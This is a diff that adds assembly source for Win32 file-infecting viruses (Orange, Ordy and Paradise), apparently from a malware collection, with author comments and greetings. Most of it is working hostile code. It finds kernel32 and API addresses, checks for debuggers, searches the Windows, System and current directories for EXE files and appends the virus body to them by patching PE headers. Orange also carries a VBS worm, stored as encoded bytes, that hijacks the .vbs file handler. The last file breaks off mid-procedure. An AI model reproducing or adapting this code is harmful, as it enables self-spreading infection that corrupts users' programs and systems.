mov dl,dh + mov dh,8 + NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h + NoCRC: dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi ; 1 byte less + jnz NextByteCRC + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret +CRC32 endp + +;** Finds api address via CRC32 of Api name +; portions of this code used from Billy Belcebu's win32 viruswriting guide +; thanx billy :) +; expects ecx to be crc32 of api, ebx to be kernel base +Get_APICRC32 PROC + + pushad ; save all of the registers - required... + + mov edx,[ebp+ExportNameRVA] ; open the export table + add edx,ebx + mov edi,[edx] + add edi,ebx + + and dword ptr [ebp+ExportCounter],00h ; clear the counter + +loop_check_crc: ; Soma this code was taken from billy belcebu's guide to virus writing for win32 + + mov esi,edi ; save edi in esi + xor al,al ; find the length + scasb + jnz $-1 + sub edi,esi ; .. solve it + pushad ; save all regs + push ecx ; save ecx as it is important + call CRC32 + pop ecx ; restore ecx + cmp eax,ecx ; compare the two CRC32's + jnz next_api ; no match + popad ; a match, restore regs and find the address + jmp found + +next_api: + popad ; restore the regs + inc dword ptr [ebp+ExportCounter] ; increase counter + + add edx,4 + mov edi,[edx] + add edi,ebx + + jmp loop_check_crc ; all over a gain + +found: + xor eax,eax ; clear eax + mov eax,dword ptr [ebp+ExportCounter] ; put the counter in it + + mov esi,[ebp+ExportOrdinalRVA] ; put the ordinal RVA... + shl eax,1 + add esi,eax + add esi,ebx ; ok now we get the ordinal + + lodsw ; we have it + + shl ax,2 ; Ordinal*4+KernelBase+AddressOfAddy's equals / + ; pointer to function address! + mov esi,[ebp+ExportAddressRVA] + add esi,ebx + add esi,eax + lodsd ; get the data pointed to + add eax,ebx ; normalize by kernel + mov [ebp+save],eax ; save it for we restore all registers now + + popad ; restore'em + + mov eax,[ebp+save] ; put into eax + + ret ; and return with our new found addy + +save dd 0 + +Get_APICRC32 endp +;---------------------------------------- +; The VBS/Worm +;---------------------------------------- +_OpenExecute db "open",0 +_ShellExecute db "ShellExecuteA",0 +_Shell32 db "Shell32.dll",0 + +vbsfile db "readme.txt.vbs",0 +vbsdata db 67,97,108,108,32,118,98,115,78,101,99,116,111,114,13,10 + db 87,83,99,114,105,112,116,46,113,117,105,116,13,10,39,13 + db 10,83,117,98,32,118,98,115,78,101,99,116,111,114,40,41 + db 13,10,68,105,109,32,118,105,13,10,13,10,83,101,116,32 + db 115,32,61,32,87,83,99,114,105,112,116,46,65,114,103,117 + db 109,101,110,116,115,13,10,83,101,116,32,111,98,106,83,104 + db 101,108,108,32,61,32,67,114,101,97,116,101,79,98,106,101 + db 99,116,40,34,87,83,99,114,105,112,116,46,83,104,101,108 + db 108,34,41,13,10,83,101,116,32,102,115,32,61,32,67,114 + db 101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105 + db 112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109 + db 79,98,106,101,99,116,34,41,13,10,77,121,115,99,114,105 + db 112,116,32,61,32,87,83,99,114,105,112,116,46,83,99,114 + db 105,112,116,70,117,108,108,78,97,109,101,13,10,83,101,116 + db 32,102,32,61,32,102,115,46,111,112,101,110,116,101,120,116 + db 102,105,108,101,40,77,121,115,99,114,105,112,116,44,49,41 + db 13,10,118,105,114,32,61,32,102,46,82,101,97,100,65,108 + db 108,13,10,102,46,99,108,111,115,101,13,10,83,101,116,32 + db 102,32,61,32,78,111,116,104,105,110,103,13,10,73,102,32 + db 73,110,83,116,114,40,49,44,76,67,97,115,101,40,77,121 + db 115,99,114,105,112,116,41,44,34,114,101,97,100,109,101,46 + db 116,120,116,46,118,98,115,34,44,49,41,32,84,104,101,110 + db 13,10,111,98,106,83,104,101,108,108,46,82,101,103,87,114 + db 105,116,101,32,34,72,75,69,89,95,67,76,65,83,83,69 + db 83,95,82,79,79,84,92,86,66,83,70,105,108,101,92,83 + db 104,101,108,108,92,79,112,101,110,92,67,111,109,109,97,110 + db 100,92,34,44,102,115,46,71,101,116,83,112,101,99,105,97 + db 108,70,111,108,100,101,114,40,48,41,32,43,32,34,92,87 + db 83,99,114,105,112,116,46,69,88,69,32,34,32,43,32,77 + db 121,115,99,114,105,112,116,32,43,32,34,32,37,49,32,34 + db 32,43,32,67,104,114,40,51,52,41,32,43,32,102,115,46 + db 71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114 + db 40,48,41,32,43,32,34,92,87,83,99,114,105,112,116,46 + db 69,88,69,32,34,32,43,32,67,104,114,40,51,52,41,32 + db 43,32,34,37,49,34,32,43,32,67,104,114,40,51,52,41 + db 32,43,32,34,32,37,42,34,32,43,32,67,104,114,40,51 + db 52,41,13,10,69,110,100,32,73,102,13,10,13,10,73,102 + db 32,115,46,67,111,117,110,116,32,62,32,49,32,84,104,101 + db 110,13,10,9,9,83,101,116,32,102,32,61,32,102,115,46 + db 111,112,101,110,116,101,120,116,102,105,108,101,40,115,40,48 + db 41,44,49,41,13,10,9,9,118,105,32,61,32,102,46,82 + db 101,97,100,65,108,108,13,10,9,9,102,46,99,108,111,115 + db 101,13,10,9,9,83,101,116,32,102,32,61,32,78,111,116 + db 104,105,110,103,13,10,13,10,9,9,83,101,116,32,102,32 + db 61,32,102,115,46,99,114,101,97,116,101,116,101,120,116,102 + db 105,108,101,40,34,36,116,116,121,107,36,46,118,98,95,34 + db 41,13,10,9,13,10,9,9,73,102,32,73,110,83,116,114 + db 40,49,44,118,105,44,34,118,98,115,78,101,99,116,111,114 + db 34,44,49,41,32,84,104,101,110,13,10,9,9,9,69,120 + db 105,116,32,83,117,98,13,10,9,9,69,110,100,32,73,102 + db 13,10,9,13,10,9,9,110,116,116,32,61,32,73,110,83 + db 116,114,40,49,44,118,105,114,44,34,39,34,44,49,41,13 + db 10,9,13,10,9,9,102,46,119,114,105,116,101,32,34,99 + db 97,108,108,32,118,98,115,78,101,99,116,111,114,34,32,43 + db 32,118,98,67,114,76,102,13,10,9,9,102,46,119,114,105 + db 116,101,32,118,105,32,43,32,118,98,67,114,76,102,13,10 + db 9,9,102,46,119,114,105,116,101,32,77,105,100,40,118,105 + db 114,44,110,116,116,44,76,101,110,40,118,105,114,41,45,110 + db 116,116,41,13,10,9,9,9,13,10,9,9,102,46,99,108 + db 111,115,101,13,10,9,9,83,101,116,32,102,32,61,32,78 + db 111,116,104,105,110,103,13,10,9,13,10,9,9,111,98,106 + db 83,104,101,108,108,46,82,117,110,32,115,40,49,41,13,10 + db 9,9,102,115,46,67,111,112,121,70,105,108,101,32,34,36 + db 116,116,121,107,36,46,118,98,95,34,44,115,40,48,41,13 + db 10,69,110,100,32,73,102,13,10,69,110,100,32,83,117,98 + db 13,10 + +sizevbs dd 1042d + +;---------------------------------------- +; Different data we use ************ +;---------------------------------------- + +CRC32_PROC dd 0FFC97C1Fh ; GetProcAddress + dd 04134D1ADh ; LoadLibraryA + dd 019F33607h ; CreateThread + dd 0AFDF191Fh ; FreeLibrary + dd 08C892DDFh ; CreateFileA + dd 0797B49ECh ; MapViewOfFile + dd 094524B42h ; UnmapViewOfFile + dd 096B2D96Ch ; CreateFileMappingA + dd 068624A9Dh ; CloseHandle + dd 0AE17EBEFh ; FindFirstFileA + dd 0AA700106h ; FindNextFileA + dd 0C200BE21h ; FindClose + dd 0FE248274h ; GetWindowsDirectoryA + dd 0593AE7CEh ; GetSystemDirectoryA + dd 0B2DBD7DCh ; SetCurrentDirectoryA + dd 0EBC6C18Bh ; GetCurrentDirectoryA + dd 0C38969C7h ; SetPriorityClass + dd 085859D42h ; SetFilePointer + dd 059994ED6h ; SetEndOfFile + dd 0C633D3DEh ; GetFileAttributesA + dd 03C19E536h ; SetFileAttributesA + dd 0EF7D811Bh ; GetFileSize + dd 0B99F1B1Eh ; GetDriveTypeA + dd 083A353C3h ; GlobalAlloc + dd 05CDF6B6Ah ; GlobalFree + dd 02E12ADB5h ; GlobalLock + dd 088BC746Eh ; GlobalUnlock + dd 052E3BEB1h ; IsDebuggerPresent + dd 0613FD7BAh ; GetTickCount + dd 0058F9201h ; ExitThread + dd 0D4540229h ; WaitForSingleObject + dd 040F57181h ; ExitProcess + dd 00AC136BAh ; Sleep + dd 021777793h ; WriteFile + dd 004DCF392h ; GetModuleFileNameA + dd 05BD05DB1h ; CopyFileA + dd 000000000h ; done mark. + + +; NumFunctions equ ($-CRC32_PROC)/4 + +GetProcAddress dd 0 ; GetProcAddress +LoadLibraryA dd 0 ; LoadLibraryA +CreateThread dd 0 ; CreateThread +FreeLibrary dd 0 ; FreeLibrary +CreateFileA dd 0 ; CreateFileA +MapViewOfFile dd 0 ; MapViewOfFile +UnmapViewOfFile dd 0 ; UnmapViewOfFile +CreateFileMappingA dd 0 ; CreateFileMappingA +CloseHandle dd 0 ; CloseHandle +FindFirstFileA dd 0 ; FindFirstFileA +FindNextFileA dd 0 ; FindNextFileA +FindClose dd 0 ; FindClose +GetWindowsDirectoryA dd 0 ; GetWindowsDirectoryA +GetSystemDirectoryA dd 0 ; GetSystemDirectoryA +SetCurrentDirectoryA dd 0 ; SetCurrentDirectoryA +GetCurrentDirectoryA dd 0 ; GetCurrentDirectoryA +SetPriorityClass dd 0 ; SetPriorityClass +SetFilePointer dd 0 ; SetFilePointer +SetEndOfFile dd 0 ; SetEndOfFile +GetFileAttributesA dd 0 ; GetFileAttributesA +SetFileAttributesA dd 0 ; SetFileAttributesA +GetFileSize dd 0 ; GetFileSize +GetDriveTypeA dd 0 ; GetDriveTypeA +GlobalAlloc dd 0 ; GlobalAlloc +GlobalFree dd 0 ; GlobalFree +GlobalLock dd 0 ; GlobalLock +GlobalUnlock dd 0 ; GlobalUnlock +IsDebuggerPresent dd 0 ; IsDebuggerPresent +GetTickCount dd 0 ; GetTickCount +ExitThread dd 0 ; ExitThread +WaitForSingleObject dd 0 ; WaitForSingleObject +ExitProcess dd 0 ; ExitProcess +Sleep dd 0 ; sleep +WriteFile dd 0 +GetModuleFileNameA dd 0 +CopyFileA dd 0 + +CurrentProc dd 0 +TempName db 32 dup(0) + +CurrentOS db 0 +kernel dd 0 + +;** Used while searching for exports +NumberOfNames dd 0 +ExportAddressRVA dd 0 +ExportNameRVA dd 0 +ExportOrdinalRVA dd 0 +ExportCounter dd 0 + +;** Anti debugging etc + +SoftICE_Win9X db "\\.\SICE",0 +SoftICE_WinNT db "\\.\NTICE",0 + +;** Various + +Buffer db 128 dup(0) ; current directory +Windows db 128 dup(0) +DirSize equ 128 + +FindData WIN32_FIND_DATA <0> + +;** Hyper infection + +DriveRoot db "c:\",0 +FileMask db "*.exe",0 + +;** Misc useless shit + +Signature db "[Win32.Orange by Ebola]",0 +misc1 db "Dedicated to the NYFD and NYPD.",0 + +virus_end = $ +end start + diff --git a/Win32/Win32.Ordy.asm b/Win32/Win32.Ordy.asm new file mode 100644 index 00000000..11e79936 --- /dev/null +++ b/Win32/Win32.Ordy.asm @@ -0,0 +1,428 @@ + +comment " +Win32.ordy by mort[MATRiX] + - simple direct action current dir last section PE appender + - using ordinal API values to access API + +Well, in viriis there's mostly use some stuff to find APIs no matter +of kernel32.dll type,... I use APIs' ordinal values to access APIs. +API's address is counted right before it's used,... +When i searched for this values in different versions of widows, +i found they differ, so i included all ord values i was able to find. +U find them in ord.zip file in tools section. +I cant test thiss virii on all windoze versions. This one seems to be +good under win2k, anyway if u wanna run it under another, recheck +API's count,... + +greetz All who helped me to create ordinal log + MiCr0s0fT - i founded my CreateFileA API DF sensitive,... + r there more? :))) +" + + +.486 +.model flat,stdcall + +extrn ExitProcess : proc +extrn MessageBoxA : proc + +filetime struc + FT_dwLowDateTime dd ? + FT_dwHighDateTime dd ? +filetime ends +fileSearch struc + FileAttributes dd ? + CreationTime filetime ? + LastAccessTime filetime ? + LastWriteTime filetime ? + FileSizeHigh dd ? + FileSizeLow dd ? + Reserved0 dd ? + Reserved1 dd ? + FileName db 0260h dup(?) + AlternateFileName db 13 dup(?) + db 3 dup(?) +fileSearch ends + +_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h +_DEBUG = 0 + +.data +dd ? + +.code +@ordy: + mov eax,@retAdd - @ordy + push offset @retAdd +_retAddress equ $ - 4 + + pushad + call @SEH + + add esp,8 + mov esp,[esp] + pop dword ptr fs:[0] + pop eax + popad + ret + + if _DEBUG + db 01000h dup(0) ;coz of debug symbols,...:( + endif + +@SEH: + push dword ptr fs:[0] + mov dword ptr fs:[0],esp + + xor eax,eax + call @findKernel +@delta label + + mov ebp,[esp - 4] ;get delta handle + + mov [ebp + _kBase - @delta],eax + + mov ebx,eax ;get kernel values,... + add eax,dword ptr [eax + 03ch] + add eax,078h + mov eax,[eax] + add eax,ebx + add eax,018h + xchg eax,esi + lodsd + push eax + lodsd + add eax,ebx + mov [ebp + _addBase - @delta],eax + pop eax + + lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)] + +@nextOrdinal: + add edi,(_ordEnd - _ordStart) - 2 + scasw + jnz @nextOrdinal + mov [ebp + _ordinalBase - @delta],edi + + push 02000h + push 040h + mov eax,_GlobalAlloc + call @callAPI + push eax ;for GlobalFree + + push eax + call @mask + db '*.*',0 +@mask: + mov eax,_FindFirstFileA + call @callAPI + xchg eax,esi + +@examine: + mov eax,[esp] + mov al,byte ptr [eax + FileAttributes] + and al,010h + cmp al,010h + jnz @fileFounded + +@nextFile: + push dword ptr [esp] + push esi + mov eax,_FindNextFileA + call @callAPI + dec eax + jz @examine + + mov eax,_GlobalFree + call @callAPI + + xor eax,eax + sub eax,[esp + 030h] ;cause exception + +@findKernel: + add eax,[esp + 030h] + and eax,0fffff000h + +@nextPage: + sub eax,01000h + cmp word ptr [eax],'ZM' + jnz @nextPage + ret +;------------------------------------------------------------------------ +@rw: +; edi - file handle +; eax - ReadFile/WriteFile +; edx - buffer +; ecx - size + + pushad + push 0 + call @fw + dd ? +@fw: + push ecx edx edi + call @callAPI + popad + ret + +;------------------------------------------------------------------------ +@fileFounded: + if _DEBUG + mov eax,[esp] + cmp dword ptr [eax + FileName],'SOHG' + jz @oki + jmp @nextFile +@oki: + endif + + mov ebx,[esp] + mov eax,[ebx + FileSizeLow] + cmp eax,04000h + jb @nextFile + + mov eax,dword ptr [ebx + FileName] + and dword ptr [ebx + LastWriteTime],eax + jz @nextFile + or dword ptr [ebx + LastWriteTime],eax + + mov edx,_ReadFile + xchg eax,ebx + add eax,01000h + xchg eax,edx + call @openRW + + push edx + push edi + mov eax,_CloseHandle + call @callAPI + + pop edx + + cld + mov edi,edx + mov eax,'EPZM' + scasw + jnz @nextFile + shr eax,010h + std + add edi,dword ptr [edi + 03ah] + scasw + scasw + jnz @nextFile + + mov eax,[edi + 076h] + shl eax,3 + add eax,052h + xchg eax,ebx + movzx eax,word ptr [edi + 8] + imul eax,028h + xadd ebx,eax + + mov eax,_vSize + add [edi + 052h],eax ;add imagesize + xadd [ebx + edi + 010h],eax ;eax - old size + push eax + add eax,[ebx + edi + 014h] ;add phys. offset + mov [ebp + _virBodyPofs - @delta],eax + pop eax + add eax,[ebx + edi + 0ch] + xchg eax,[edi + 02ah] ;set/get entrypoint + add eax,[edi + 036h] + mov [ebp + _retAddress - @delta],eax ;set it,... + add dword ptr [ebx + edi + 08h],01000h ;add virtual size + or dword ptr [ebx + edi + 024h],0a0000020h + + lea eax,[ebp + @finalInfection - @delta] + push eax + mov eax,_WriteFile + +@openRW: + mov ecx,01000h + + cld ;coz of CreateFileA DF sensitivity,...:))) + call @open + call @rw + ret + +;------------------------------------------------------------------------ +@setA: + push ebx + push eax + mov eax,_SetFileAttributesA + call @callAPI + ret + +;----------------------------------------------------------------------- +_CloseHandle = 0 ;API handles +_CreateFileA = 2 +_GlobalAlloc = 4 +_GlobalFree = 6 +_WriteFile = 8 +_ReadFile = 0ah +_FindFirstFileA = 0ch +_FindNextFileA = 0eh +_SetEndOfFile = 010h +_SetFileTime = 012h +_SetFileAttributesA = 014h + +_ordSize equ _ordEnd - _ordStart +;shl 2 +_ordinals label + +_ordStart label +_ordinals95 label + dw 0682 ;APIs num + dw 088h * 4 ;CloseHandle + dw 09dh * 4 ;CreateFileA + dw 01b5h * 4 ;GlobalAlloc + dw 01bch * 4 ;GlobalFree + dw 02e3h * 4 ;WriteFile + dw 0242h * 4 ;ReadFile + dw 0f9h * 4 ;FindFirstFileA + dw 0fch * 4 ;FindNextFile + dw 0281h * 4 ;SetEndOfFile + dw 028bh * 4 ;SetFileTime + dw 0288h * 4 ;SetFileAttributesA +_ordEnd label + +_ordinals98 label ;(r1,SE) + dw 0745 ;APIs num + dw 09fh * 4 ;CloseHandle + dw 0b8h * 4 ;CreateFileA + dw 01e5h * 4 ;GlobalAlloc + dw 01ech * 4 ;GlobalFree + dw 0335h * 4 ;WriteFile + dw 027dh * 4 ;ReadFile + dw 011bh * 4 ;FindFirstFileA + dw 0120h * 4 ;FindNextFile + dw 02c5h * 4 ;SetEndOfFile + dw 02cfh * 4 ;SetFileTime + dw 02cch * 4 ;SetFileAttributesA + +_ordinalsNT label + dw 02a1h ;APIs num + dw 018h * 4 ;CloseHandle + dw 031h * 4 ;CreateFileA + dw 0155h * 4 ;GlobalAlloc + dw 015ch * 4 ;GlobalFree + dw 027bh * 4 ;WriteFile + dw 01d6h * 4 ;ReadFile + dw 082h * 4 ;FindFirstFileA + dw 087h * 4 ;FindNextFile + dw 0210h * 4 ;SetEndOfFile + dw 021ah * 4 ;SetFileTime + dw 0217h * 4 ;SetFileAttributesA + +_ordinals2k label + dw 0337h ;APIs num + dw 01eh * 4 ;CloseHandle + dw 037h * 4 ;CreateFileA + dw 019ch * 4 ;GlobalAlloc + dw 01a3h * 4 ;GlobalFree + dw 030eh * 4 ;WriteFile + dw 023dh * 4 ;ReadFile + dw 0a3h * 4 ;FindFirstFileA + dw 0ach * 4 ;FindNextFile + dw 028ch * 4 ;SetEndOfFile + dw 0297h * 4 ;SetFileTime + dw 0293h * 4 ;SetFileAttributesA + +;------------------------------------------------------------------------ +@open: + ;eax - filename + pushad + mov eax,[esp + 028h] + add eax,FileName + push 0 0 3 0 1 + push 080000000h or 040000000h + push eax + + mov ebx,020h + call @setA + + mov eax,_CreateFileA + call @callAPI + mov [esp],eax ;handle to edi + popad + ret + +;------------------------------------------------------- +;eax - API handle +@callAPI: + pop edi + add eax,012345678h +_ordinalBase equ $ - 4 + movzx eax,word ptr [eax] + add eax,012345678h +_addBase equ $ - 4 + mov eax,[eax] + add eax,012345678h +_kBase equ $ - 4 + call eax + jmp edi +;---------------------------------------------------------------- +@finalInfection: + mov eax,012345678h +_virBodyPofs equ $ - 4 + sub eax,01000h + push eax + mov eax,_ReadFile + xor ecx,ecx + inc ecx + +@nextByte2Seek: + call @rw + dec dword ptr [esp] + jnz @nextByte2Seek + pop eax + + mov ecx,_vSize + lea edx,[ebp + @ordy - @delta] + add eax,_WriteFile + call @rw + + push esi + + push edi edi + mov eax,_SetEndOfFile + call @callAPI + + mov ebx,[esp] + mov eax,[esp + 0ch] + add eax,LastWriteTime + push eax + sub eax,8 + push eax + sub eax,8 + push eax + push ebx + mov eax,_SetFileTime + call @callAPI + + mov eax,_CloseHandle + call @callAPI + + mov ebx,[esp + 4] + mov eax,[ebx + FileAttributes] + xchg eax,ebx + add eax,FileName + call @setA + + pop esi ;restore search handle + +@fuckFile: + jmp @nextFile + +@retAdd: + push 0 + call @title + db '.ordy by mort[MATRiX]',0 +@title: + call @mess + db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0 +@mess: + push 0 + call MessageBoxA + call ExitProcess,0 + ret +end @ordy diff --git a/Win32/Win32.Paradise.asm b/Win32/Win32.Paradise.asm new file mode 100644 index 00000000..2ec0a39d --- /dev/null +++ b/Win32/Win32.Paradise.asm @@ -0,0 +1,823 @@ +; [Win32.Paradise] - Bugfixed and improved version of Iced Earth +; Copyright (c) 1999 by Billy Belcebu/iKX +; +; ?????? Welcome to another Billy's production. +; ???? ??????? ??? Enjoy this new... +; ???????????????????? +; ? ???????????????? ??? +; ? ????????????? ? +; ??????? ?? ?????? ??? ??? ????? ??? ??? ?????? ?????? +; ??????? ?? ?? ???? ? ??? ? ?? ?? ? ??? ? ??????? ??????? +; ? ? ?? ? ? ??? ? ?? ?? ? ??? ? ??????? ??????? ??? +; ?? ??????? ????? ??????? ??????? ??????? ??? +; ?? ??? ??????? ??????? ??????? ??????? ?????? ????? ??????? ??????? +; ??????????? ? ??? ? ? ??? ? ? ??? ? ? ??? ? ? ?? ?? ?? ?? ? ????? ? ????? +; ????? ?? ???? ? ????? ? ??? ? ? ? ??? ? ??? ? ? ??? ? ?? ?? ????? ? ? ????? +; ??? ??? ??? ??????? ??? ??? ??????? ????? ??????? ??????? +; +; Virus Name : Paradise +; Virus Author : Billy Belcebu/iKX +; Origin : Spain +; Platform : Win32 +; Target : PE files +; Compiling : TASM 5.0 and TLINK 5.0 should be used +; tasm32 /ml /m3 paradise,,; +; tlink32 /Tpe /aa /c /v paradise,paradise,,import32.lib, +; Notes : Not very innovative, just made for practice some things, as +; CRC32 GetAPI engine, and such like. The name comes from one +; of the best songs i've ever heard, and probably my favouri- +; te song of Stratovarius. Its lyrics are, sadly, an actual +; reality: we are killing the nature slowly and without any +; kind of mercy, thinking that we can make any use of every- +; thing around without any responsability... +; Greetings : It is very clear... to all the Stratovaius fans (specially +; to Int13h and Owl) and all the ecologist activists. +; Fucks : To everything related to the bullfights, the greatest act +; of the human barbarism with the animals, the spanish's +; national shame; and to all the acts that go againist the +; rights of the animals and/or the vegetables, as well as +; with the persons (goddamn fascisms!). +; +; Rojo, sangre +; un color muy nacional +; morbo, suerte +; sol y arena pide Dios +; arte, muerte +; sirve de alimento +; pase, valiente, +; y vuelta al ruedo!!! +; Cuando el acero me traspasa el corazon +; y se le llama fiesta +; y otra vuelta de tuerca +; cuando el sadismo se convierte en tradicion +; y la faena en gesta +; y nadie se molesta +; -Reincidentes- +; + + .586p + .model flat + +; ??----?????? ? +; : Paradise virus - Data, macros and such like shit : +; ? ??????---??? + +extrn MessageBoxA:PROC +extrn ExitProcess:PROC + +virus_size equ (offset virus_end-offset virus_start) +heap_size equ (offset heap_end-offset heap_start) +total_size equ virus_size+heap_size +shit_size equ (offset delta-offset Paradise) +section_flags equ 00000020h or 20000000h or 80000000h +temp_attributes equ 00000080h +n_infections equ 04h + +mark equ 04Ch + +; Only hardcoded for 1st generation, don't worry ;) + +kernel_ equ 0BFF70000h +kernel_wNT equ 077F00000h + +; Interesting macros for my code + +cmp_ macro reg,joff1 ; Optimized version of + inc reg ; CMP reg,0FFFFFFFFh + jz joff1 ; JZ joff1 + dec reg ; The code is reduced in 3 + endm ; bytes (7-4) + +apicall macro apioff ; Optimize muthafucka! + call dword ptr [ebp+apioff] + endm + + .data + +szTitle db "Paradise v1.00",0 + +szMessage db "Paradise - Visions - Stratovarius",10 + db "Virus size............" + db virus_size/1000 mod 10 + "0" + db virus_size/0100 mod 10 + "0" + db virus_size/0010 mod 10 + "0" + db virus_size/0001 mod 10 + "0" + db " bytes",0 + db "Copyright (c) 1999 by Billy Belcebu/iKX",0 + + .code + +; ??----?????? ? +; : Paradise virus - Virus startz here : +; ? ??????---??? + +virus_start label byte + +Paradise: + pushad ; Push all da shit + pushfd + + call delta_ ; Hardest code to undestand ;) +delta: db "[iKX4EVER" ; Yeah... iKX :) +delta_: pop ebp + mov eax,ebp + sub ebp,offset delta + + sub eax,shit_size ; Obtain at runtime the + sub eax,00001000h ; imagebase of the process +NewEIP equ $-4 + mov dword ptr [ebp+ModBase],eax + + call ChangeSEH ; SEH rlz :) + mov esp,[esp+08h] + jmp RestoreSEH +ChangeSEH: + xor ebx,ebx + push dword ptr fs:[ebx] + mov fs:[ebx],esp + + mov esi,[esp+2Ch] ; Get program return address + and esi,0FFFF0000h ; Align to page + mov ecx,5 + call GetK32 + + mov dword ptr [ebp+kernel],eax ; EAX must be K32 base address + + lea esi,[ebp+@@NamezCRC32] + lea edi,[ebp+@@Offsetz] + call GetAPIs ; Retrieve all APIs + + call PrepareInfection + call InfectItAll + call payload + + or ebp,ebp ; Is 1st gen? + jz fakehost + +RestoreSEH: + xor ebx,ebx + pop dword ptr fs:[ebx] + pop eax + + popfd + popad + + mov ebx,12345678h + org $-4 +OldEIP dd 00001000h + + add ebx,12345678h + org $-4 +ModBase dd 00400000h + + push ebx + ret + +; ??----?????? ? +; : Paradise virus - Retrieve directories to infect : +; ? ??????---??? + +PrepareInfection: + lea edi,[ebp+WindowsDir] + push 7Fh + push edi + apicall _GetWindowsDirectoryA + + add edi,7Fh + push 7Fh + push edi + apicall _GetSystemDirectoryA + + add edi,7Fh + push edi + push 7Fh + apicall _GetCurrentDirectoryA + ret + +; ??----?????? ? +; : Paradise virus - Infect windows, windows\system and the current dir : +; ? ??????---??? + +InfectItAll: + lea edi,[ebp+directories] + mov byte ptr [ebp+mirrormirror],dirs2inf +requiem: + push edi + apicall _SetCurrentDirectoryA + + push edi + call Infect + pop edi + + add edi,7Fh + + dec byte ptr [ebp+mirrormirror] + cmp byte ptr [ebp+mirrormirror],00h + jnz requiem + + ret + +; ??----?????? ? +; : Paradise virus - Searching... Seek and infect! : +; ? ??????---??? + +Infect: and dword ptr [ebp+infections],00000000h ; reset countah + lea eax,[ebp+offset WIN32_FIND_DATA] ; Find's shit + push eax + lea eax,[ebp+offset EXE_MASK] + push eax + + apicall _FindFirstFileA + cmp_ eax,FailInfect + + mov dword ptr [ebp+SearchHandle],eax + +__1: push dword ptr [ebp+ModBase] + push dword ptr [ebp+OldEIP] + push dword ptr [ebp+NewEIP] + + call Infection + + pop dword ptr [ebp+NewEIP] + pop dword ptr [ebp+OldEIP] + pop dword ptr [ebp+ModBase] + + inc byte ptr [ebp+infections] + cmp byte ptr [ebp+infections],n_infections + jz FailInfect + +__2: lea edi,[ebp+WFD_szFileName] + mov ecx,MAX_PATH + xor al,al + rep stosb + + lea eax,[ebp+offset WIN32_FIND_DATA] + push eax + push dword ptr [ebp+SearchHandle] + apicall _FindNextFileA + or eax,eax + jz CloseSearchHandle + jmp __1 + +CloseSearchHandle: + push dword ptr [ebp+SearchHandle] + apicall _FindClose + +FailInfect: + ret + +; ??----?????? ? +; : Paradise virus - Infect found file : +; ? ??????---??? + +Infection: + lea esi,[ebp+WFD_szFileName] ; Get FileName to infect + push 80h + push esi + apicall _SetFileAttributesA ; Wipe its attributes + + call OpenFile ; Open it + + cmp_ eax,CantOpen + + mov dword ptr [ebp+FileHandle],eax + + mov ecx,dword ptr [ebp+WFD_nFileSizeLow] ; 1st we create map with + call CreateMap ; its exact size + cmp_ eax,CloseFile + + mov dword ptr [ebp+MapHandle],eax + + mov ecx,dword ptr [ebp+WFD_nFileSizeLow] + call MapFile ; Map it + cmp_ eax,UnMapFile + + mov dword ptr [ebp+MapAddress],eax + + mov esi,eax ; Get PE Header + mov esi,[esi+3Ch] + add esi,eax + cmp dword ptr [esi],"EP" ; Is it PE? + jnz NoInfect + + cmp dword ptr [esi+mark],"SDRP" ; Was it infected? + jz NoInfect + + push dword ptr [esi+3Ch] + + push dword ptr [ebp+MapAddress] ; Close all + apicall _UnmapViewOfFile + + push dword ptr [ebp+MapHandle] + apicall _CloseHandle + + pop ecx + + mov eax,dword ptr [ebp+WFD_nFileSizeLow] ; And Map all again. + add eax,virus_size + + call Align + xchg ecx,eax + + call CreateMap + cmp_ eax,CloseFile + + mov dword ptr [ebp+MapHandle],eax + + mov ecx,dword ptr [ebp+NewSize] + call MapFile + cmp_ eax,UnMapFile + + mov dword ptr [ebp+MapAddress],eax + + mov esi,eax ; Get PE Header + mov esi,[esi+3Ch] + add esi,eax + + mov edi,esi + + movzx eax,word ptr [edi+06h] + dec eax + imul eax,eax,28h + add esi,eax + add esi,78h + mov edx,[edi+74h] + shl edx,3 + add esi,edx + + mov eax,[edi+28h] + mov dword ptr [ebp+OldEIP],eax + + mov edx,[esi+10h] + mov ebx,edx + add edx,[esi+14h] + + push edx + + mov eax,ebx + add eax,[esi+0Ch] + mov [edi+28h],eax + mov dword ptr [ebp+NewEIP],eax + + mov eax,[esi+10h] + add eax,virus_size + mov ecx,[edi+3Ch] + call Align + + mov [esi+10h],eax + mov [esi+08h],eax + + pop edx + + mov eax,[esi+10h] + add eax,[esi+0Ch] + mov [edi+50h],eax + + or dword ptr [esi+24h],section_flags + mov dword ptr [edi+mark],"SDRP" + + lea esi,[ebp+Paradise] + xchg edi,edx + add edi,dword ptr [ebp+MapAddress] + mov ecx,virus_size + rep movsb + + jmp UnMapFile + +NoInfect: + dec byte ptr [ebp+infections] + mov ecx,dword ptr [ebp+WFD_nFileSizeLow] + call TruncFile + +UnMapFile: + push dword ptr [ebp+MapAddress] + apicall _UnmapViewOfFile + +CloseMap: + push dword ptr [ebp+MapHandle] + apicall _CloseHandle + +CloseFile: + push dword ptr [ebp+FileHandle] + apicall _CloseHandle + +CantOpen: + push dword ptr [ebp+WFD_dwFileAttributes] + lea eax,[ebp+WFD_szFileName] + push eax + apicall _SetFileAttributesA + ret + +; ??----?????? ? +; : Paradise virus - Get KERNEL32.DLL base address (simplest method) : +; ? ??????---??? + +GetK32 proc +_@1: jecxz WeFailed + cmp word ptr [esi],"ZM" + jz CheckPE +_@2: sub esi,10000h + dec ecx + jmp _@1 +CheckPE: + mov edi,[esi+3Ch] + add edi,esi + cmp dword ptr [edi],"EP" + jz WeGotK32 + jmp _@2 +WeFailed: + mov ecx,cs + xor cl,cl + jecxz WeAreInWNT + mov esi,kernel_ + jmp WeGotK32 +WeAreInWNT: + mov esi,kernel_wNT +WeGotK32: + xchg eax,esi + ret +GetK32 endp + +; ??----?????? ? +; : Paradise virus - Get all API addresses : +; ? ??????---??? + +GetAPIs proc +@@1: 